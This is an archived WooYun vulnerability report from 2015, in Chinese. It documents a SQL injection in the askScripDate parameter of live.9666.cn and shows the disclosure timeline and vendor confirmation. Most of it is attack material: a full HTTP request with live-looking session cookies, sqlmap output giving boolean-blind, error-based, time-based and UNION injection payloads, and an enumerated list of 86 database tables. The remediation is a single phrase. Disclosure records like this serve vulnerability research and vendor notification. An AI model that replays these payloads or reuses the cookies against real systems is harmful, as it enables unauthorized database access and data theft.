乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-25: 细节已通知厂商并且等待厂商处理中 2015-09-25: 厂商已经确认,细节仅向厂商公开 2015-10-05: 细节向核心白帽子及相关领域专家公开 2015-10-15: 细节向普通白帽子公开 2015-10-25: 细节向实习白帽子公开 2015-11-09: 细节向公众公开
GET /scrip/findMyScrips.action?roomsInfo=&askScripDate=2015-07-20'' HTTP/1.1Host: live.9666.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://live.9666.cn/scrip/myScrips?toolbarCookie: cowboy_website=c226bc22-af26-4e88-a886-80d132782618; musicStatus=on; __utma=236883550.934637685.1443167390.1443167390.1443167390.1; __utmb=236883550.11.10.1443167390; __utmc=236883550; __utmz=236883550.1443167390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; cowboy_temp=""; cowboy_login=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_user_name=asdfg; cowboy_login_imply=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_nick_name=61736466675f34354c4f4e43; cowboy_latest_login_time=1443168569; haoshengyin=1; JSESSIONID=D80ECF2572888245CD6E573022B67F0DConnection: keep-alive
参数:askScripDate
sqlmap resumed the following injection point(s) from stored session:---Parameter: askScripDate (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: roomsInfo=&askScripDate=-5945' OR 6307=6307# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: roomsInfo=&askScripDate=-4368' OR 1 GROUP BY CONCAT(0x7162787a71,(SELECT (CASE WHEN (1877=1877) THEN 1 ELSE 0 END)),0x71626a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (comment) Payload: roomsInfo=&askScripDate=2015-07-20''' OR SLEEP(5)# Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: roomsInfo=&askScripDate=2015-07-20''' UNION ALL SELECT CONCAT(0x7162787a71,0x6e4c4e70697444767670,0x71626a7171)#---web application technology: JSPback-end DBMS: MySQL 5.0.12Database: live[86 tables]+-------------------------------------------+| t_liv_ad_convertion_percent || t_liv_ad_record || t_liv_admin_statistics || t_liv_apply || t_liv_bulletin || t_liv_buy_vip_detail || t_liv_certificate || t_liv_certificate_account || t_liv_chat || t_liv_chat_examination_permission || t_liv_chat_examination_recording || t_liv_check_in || t_liv_common_view || t_liv_common_view_order || t_liv_data_bank || t_liv_data_bank_active || t_liv_data_bank_addition || t_liv_data_bank_addition_audit_record || t_liv_data_bank_audit_history || t_liv_data_bank_category || t_liv_data_bank_leavemessage || t_liv_data_bank_leavemessage_count || t_liv_data_bank_master || t_liv_data_bank_question || t_liv_data_bank_replymessage || t_liv_data_bank_replymessage_audit_record || t_liv_data_bank_user_see || t_liv_data_detail || t_liv_data_detail_log || t_liv_date_bank_remark || t_liv_forbid || t_liv_gift || t_liv_ip_statistics || t_liv_liver_advertisement || t_liv_liver_advertisement_ectype || t_liv_liver_introduce || t_liv_liver_introduce_ectype || t_liv_message || t_liv_message_notice || t_liv_message_recommend || t_liv_mobile_feedback || t_liv_notice || t_liv_privilege || t_liv_recommend_column || t_liv_recommend_liver || t_liv_recommend_message || t_liv_recommend_script || t_liv_record || t_liv_relevance_website || t_liv_room || t_liv_room_certificate || t_liv_room_property || t_liv_room_relevance || t_liv_score_detail || t_liv_scrip_answer || t_liv_scrip_ask || t_liv_scrip_ask_first_record || t_liv_scrip_recommend || t_liv_statistic_chat_scrip_total || t_liv_statistic_chat_scrip_total_rank || t_liv_statistic_chat_total || t_liv_statistic_chat_user_room || t_liv_statistic_chat_user_room_rank || t_liv_statistic_room_available || t_liv_statistic_scrip_total || t_liv_statistic_scrip_user_room || t_liv_statistic_scrip_user_room_rank || t_liv_statistics || t_liv_support_num || t_liv_tag || t_liv_tag_chat || t_liv_tag_message || t_liv_tag_view || t_liv_title || t_liv_title_level || t_liv_training_camp || t_liv_user || t_liv_view || t_liv_vipinfo || t_liv_vote_detail || t_live_room_property_log || t_live_statics_month || t_live_weibo_account || v_hall_record || v_hall_record_hits || v_hall_room |+-------------------------------------------+
参数过滤
危害等级:高
漏洞Rank:20
确认时间:2015-09-25 19:48
感谢提交
暂无